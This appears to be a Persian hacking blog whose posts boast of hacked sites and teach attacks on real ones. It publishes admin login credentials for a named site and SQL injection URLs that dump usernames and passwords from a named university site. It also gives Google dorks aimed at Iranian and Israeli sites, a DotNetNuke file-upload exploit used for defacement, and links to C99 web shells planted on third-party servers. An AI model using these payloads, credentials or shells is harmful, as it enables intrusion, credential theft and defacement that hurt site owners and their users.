๑۩۞۩๑ وحشتستان๑۩۞۩๑ هك آيدي

هک سایت

سلام دوستان این سایت هم یکی تو نظرات گقته بودن که چطوری هک میشه . هک کردیم و به زودی فیلم نحوه ی هک شدنش رو هم میزارم اینجا .

http://totalgcc.com/

در ضمن ما میخواهیم سایت باز کنیم و به چند نفر همکار نیاز داریم .کسانی که مایل هستن در نظرات همین پست بگن.

[+] نوشته شده توسط حامد در 4:53 بعد از ظهر | |

هک سایت

سلام دوستان اینم یه سایت ایرانی که بخاطر ضعف در امنیت هک شد.

www.freeir.co.cc

این هم یوزر و پسورد سایت برین حال کنین.

صفحه لوگین: http://www.freeir.co.cc/admin.php

نام کاربری:danger

پسورد:hamid123456

نظر یادتون نره. و به سایت آسیب نرسانید.

[+] نوشته شده توسط حامد در 4:40 بعد از ظهر | |

سایت اینجکت شده برای شما

سلام دوستان عزیز امروز براتون بیش از ۵۰۰ سایت اینجکت شده میزارم که استفاده کنین.

این هم لینک دانلود: http://hamedhaker.persiangig.com/a3.txt

فقط نظر فراموش نشه.

[+] نوشته شده توسط حامد در 4:34 بعد از ظهر | |

آموزش کامل sql-injection

سلام دوستان

انشاءالله از امروز شروع میکنیم به کار

آموزش اول : SQLI

توضیح : sql مخفف Structure query language هست یعنی زبانی که ساختارش به صورت پرس و جو هست

این زبان دستورات زیادی نداره و برنامه نویسا برای اینکه کارشون برای نوشتن برنامه های تحت وب آسون بشه ازش استفاده میکنن

مثلا در همین قسمت ثبت و نام و بخش کاربری به جای اینکه برنامه نویس به ازای هر کاربر یه فایل درست کنه و هر وقت کاربر وارد میشه یا بخش خودشو تغییر میده بیاد فایلو ویرایش کنه (به حجمش اضافه کنه یا کم کنه) میاد به راحتی با برقراری ارتباط بین زبان برنامه نویسیش (php یا ..) با پایگاه داده ارتباط برقرار میکنه و اون رو آپدیت میکنه !

اصطلاحات زیر رو باید بلد باشید :

DATABASE : یا پایگاه داده که تمامی تیبل های یوزر در اون ذخیره میشن
table : در این زبان به تعداد ستون که وجود داره میگن ، یک اصطلاحی من دارم که مثلا در یک پوشه تعدادی پوشه دیگه وجود داره و در پوشه های دیگه تعدادی فایل ، ما به اون پوشه اولی و اصلی میگیم database و به پوشه های داخل اون میگیم TABLE و فایل هایی که در TABLE هست میگیم COLUMN پس با این مثال دیگه column هم تعریف شد !

این زبان تعدادی دستور هم دارن که خیلی به کار میان :
فقط برای آشنایی تعدادیشون رو میگم : SELECT , UPDATE , DELET , INSERT

یه چیز مهم دیگه یادم رفت :
ما زبان های به اصطلاح SQL زیادی داریم که هر کدومش برای یه سیستم عامل یا یه زبان برنامه نویسی بیشتر به کار میرن ، عمده تریناشون اینان : mysql , mssql , postegre , ..

که mysql برای php و linux کاربرد بیشتری داره
mssql هم برای win هست برای زبان های asp و asp.net(aspx)

این دوتا برای ما مهمن بقیه زیاد برای ما اهمیتی ندارن

و هدف این بخش هم آموزش inj در این دوتاس !

در درس های بعدی هدف inj و ویژگی های mysql رو بهش میپردازیم

یا حق

[+] نوشته شده توسط حامد در 2:51 بعد از ظهر | |

sql2

سلام دوستان عزیز .ببخشید که چند روزی نبودم .

همون طور که گقته بودم امروز هم قسمت دوم آموزش sql injection رو میگم .

تو این آموزش میخوام با یک مثال پیش بریم .پس لطفا به سایت آسیب نزنید .

سایت هدف ما : www.computersr.com (مال دانشگاه آزاد هست)

اگه وارد سایت بالا بشیم و روی یکی از لینکها کلیک کنیم .در انتهای لینکمون یک آیدی میاد و اگه جلوش یک کاراکتر غیر مجاز مثل ' بزاریم سایت ارور میده.

همون طور که در درس قبلی گفتم , اگر سایت ارور بده یعنی میشه هکش کرد .تو این سایت هم ارور داد .

لینک ارور= www.computersr.com/newsItem.php?id=277'

حالا طبق درس قبلی میاییم و با دستور order+by تعداد کالومن ها رو میاریم بیرون .

همان طور که گفته بودم غمل میکنم .: www.computersr.com/newsItem.php?id=-277+order+by+1--

خوب حالا اون عدد آخر که در بالا من یک دادم رو میبریم بالا تا جایی که ارور بده .که در این مثال اگر به جای یک 8 بدیم ارور میده سایت .

ولی اگر 7 بدیم سایت بدون هیچ اروری بالا میاد . پس تعداد کالومن این سایت 7 تا هست . حالا میایم و از دستور union +select استفاده میکنیم.

که میشه این : www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,3,4,5,6,7--

همون طور که میبینید سایت به ما عدد 3 رو نشون میده .یعنی user و pass تو این کالومن هست .

حالا باید تیبیلی که userو pass توش هست رو حدس بزنیم . که در اینجا اسم تیبیل مورد نظر ما user هست . که باید با دستور from بازش کنیم .

که میشه اینجوری: www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,3,4,5,6,7+from+user

خوب حالا باید به جای 3 اسم کالومن یوزر و پسورد رو بنویسیم . که در اینجا ما میخواهیم تمام یوزر و پسوردها رو بدست بیاریم و از دستور group_concat استفاده میکنیم.

که میشه اینجوری: www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,group_concat(username,0x3a,password),4,5,6,7+from+user

حالا میپرسین که این 0x3a چی هست که نوشتی ؟ این دستور باعث میشه که بین یوزر و پسورد علامت : قرار بگیره و قاطی نشن.

اگر مشکلی داشتین تو نظرات بگین و من در اولین فرصت تو نظرات جوابش رو میگم .

و اگه خواستین بگین تا من مثالهای زیادتری بگم تا متوجه بشین . در پایان دوباره میگم لطفا به سایتی که در مثال گفته میشه آسیب نرسانید.

[+] نوشته شده توسط حامد در 6:9 بعد از ظهر | |

آموزش sql

سلام دوستان عزیز

تو این آموزش میخوام شما رو با حملات sql injection آشنا کنم ..

خوب برای شروع متن زیر رو تو گوگل سرچ کنین .

inurl:"news.php?id=" site:.ir

میبینید که گوگل سایتهای زیادی به ما داد که از sql استفاده میکنن . حالا باید تست کنیم که میشه هک کردیشون یا نه؟!!!!!!!!!!!

حالا سایت مورد نظر خودمون رو انتخاب میکنیم .

که میشه مثل این : www.site.com/news.php?id=2

حالا این عدد که من در اینجا 2 نوشتم متغیر هست واگه تو سایتی که شما انتخاب کردین .این عدد تغییر کرد تعجب نکنین .:D

حالا به آخر لینک که عدد نوشته شده کارکتر ' رو اضافه میکنیم .اگه سایت Error داد یعنی سایت مورد نظر ما مشکل داره .(البته این فقط یکی از راه هاست )

به فرض که سایت Error داد . حالا باید از دستورات sql استفاده کنیم . وتعداد ستونها و کلومن ها رو به دست بیاریم .

اولین دسور که باید استفاده کنیم دستور Order+by+x هست . که در اینجا x یک متغیر هست که باید به جاش یک عدد بنویسیم .

که میشه مثل این: www.site.com/news.php?id=-2+order+by+1--

خوب حالا این عدد که در این مثال من 1 رو نوشتم میتونه تغییر کنه .اول 1 رو وارد میکنیم اگر سایت بالا اومد 2 رو وارد کنیم و به همین صورت ادامه میدیم .

این کار رو تا جایی ادامه میدیم که سایت Error بده و بالا نیاد .خوب مثلا اگر زدیم 5 و سایت Error داد یعنی تعداد کلومن ما 4 تا هستش .

بعد از پیدا کردن کلومن ها باید از دستور union+select استفاده کنیم .

که برای مثال بالا میشه :+union+select+1,2,3,4-- www.site.com/news.php?id=-2

خوب اگر درست وارد کرده باشین سایت به شما چند تا عدد نشون میده مثلا 2و 3 رو نشون داد .

خوب اول باید ببینیم ورژن چی هستش که برای این کار باید به جای 2 یا 3 بنویسین version() که اگر ورژن پایین تر از 4 بود باید تیبیل ادمین رو حدس بزنین .

که ما فعلا فرض میکنیم که ورژن پایین تر از 4 هست .

حالا ما میایم به آخر لینکمون From+Tabel Name رو اضافه میکنیم . که به جای Tabel name باید اون چیزی که حدس زدیم رو بنویسیم .

به طور مثال یکی از اینها : user, admin,users,admins,login,...

خوب به طور مثال ما admin زدیم و سایت بالا اومد بدون هیچ error و همون عدد های 2 و 3 رو هم نشون داد .

حالا باید به جای 2و3 user va pass بنویسیم تا به جای اونا یوزر و پسورد سایت بیاد .

نکته : ما در مثال user,pass زدیم ممکنه در بعضی از سایتها اینها فرق کنن .

خوب دبگه خسته شدم برای این جلسه بسته اگه خوب بود بگین تا ادامه بدم

[+] نوشته شده توسط حامد در 11:8 قبل از ظهر | |

هک سایتها

سلام دوستان عزیز . چند ماهی نبودم .از به بعد سعی میکنم زود به زود وبلاگ رو آپ کنم .

این آموزش که میخوام بگم قدیمی هستش ولی بیشتر افراد نمیدونن .

در این آموزش میخوام شما رو با یک روشی آشنا کنم که با هاش میتونین بیش از 10000000 تا سایت رو هک کنید .

خوب برای این کار باید دورک زیر رو تو گوگل سرچ کنین .

inurl:"/portals/0" site:.ir

در این drok بالا شما میتونین ir رو عوض کنین و مثلا بزنین il که واسه اسراییل هستش .

وقتی سایتها رو سرچ کردین و پیدا کردین به آخر سایت لینک زیر رو اضافه میکنید .

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

مثلا : www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

حالا اگر سایت ما آسیبپذیر باشه سه تا گزینه میده و ما سومی رو انتخاب میکنیم . (برای ارسال فایل)

حالا میبینید که فایلهای سایت رو نشون میده ولی ما نمیتونیم چیزی آپلود کنیم .

برای این که ما چیزی آپلود کنیم باید لینک زیر رو به جای آدرس سایت بزنیم (تو آدرس بار)

javascript:__doPostBack('ctlURL$cmdUpload','')

خوب حالا میتونید فایل آپلود کنین ولی هر فایلی رو نه . مثلا نمیتونیم صفحه html یا php آپ کنیم .

خوب شما میتونین در یک فایل متنی بنویسید که سایت هک شد و آپلود کنین .

وقتی آپلود کردین آدرس فایل به صورت زیر خواهد شد .

www.site.com/portals/0/file name.txt

امیدوارم که خوشتون اومده باشه :D

[+] نوشته شده توسط حامد در 11:3 قبل از ظهر | |

اموزش C99

اموزش C99

این اموزش رو در 4 بخش اماده کردم که همراه فیلم و مقاله هستش . مقاله مو به مو با فیلم اموزش داده شده .

حجم فیلم ها بالاست و بر این شدم که یک فیلم دیگه با خلاصه c99 اماده کردم که اموزش خوبی هستش

C99-1 دانلود

C99-2 دانلود

C99-3 دانلود

خوب این هم چند سایت از سرور های مختلف که از این سایت ها شل کد c99 گرفته شده برای شروع به کار

دستورهای لینوکس در هنگام شل گرفتن از سایت هم می تونید در بخش مقاله های اموزشی هک بر دارید
و با این دستورات از سایتی که شل گرفتین یا روی همین سایت ها کار کنید

http://www.kupi-leti.ru/company/t.php

http://www.chesapeakeclimate.org/doc/c.php

http://www.dntalk.de/web.php

http://iett.gov.tr/en/kitap/

http://www.ezitrading.com.au/catTree/dast.php

[+] نوشته شده توسط در 6:18 بعد از ظهر | |

5 تا XSS در mozilla

5 تا XSS در mozilla

حتما مفید خواهد بود

به ادامه مطلب برید

ادامه مطلب

[+] نوشته شده توسط حامد در 7:17 بعد از ظهر | |

اموزش هک ای اس پی:

آموزش هک اي اس پي به صورت كاملا حرفه اي و با كلاس در ادامه مطلب

نظر فراموش نشود

ادامه مطلب

[+] نوشته شده توسط حامد در 6:38 بعد از ظهر | |

هک سایتهای php helpdesk

امروز می خوام طریقه هک کردن سایتهای پی اچ پی رو که از HelpDesk استفاه می کنن رو کامل توضیح بدم.

براي خواندن به ادامه مطلب بريد

ادامه مطلب

[+] نوشته شده توسط حامد در 2:47 قبل از ظهر | |

هک سایت های اپاچی

امروز می خوام یک باگ درست حسابی واسه هک سایت بذارم.
شما با استفاده از این روش می تونید سایتهایی رو که اپاچی استفاده می کنن و بر روی سرورهای ویندوز وجود داره رو هک کنید.

برای خواندن به ادامه مطلب برید

ادامه مطلب

[+] نوشته شده توسط حامد در 2:44 قبل از ظهر | |

:: مطالب پيشين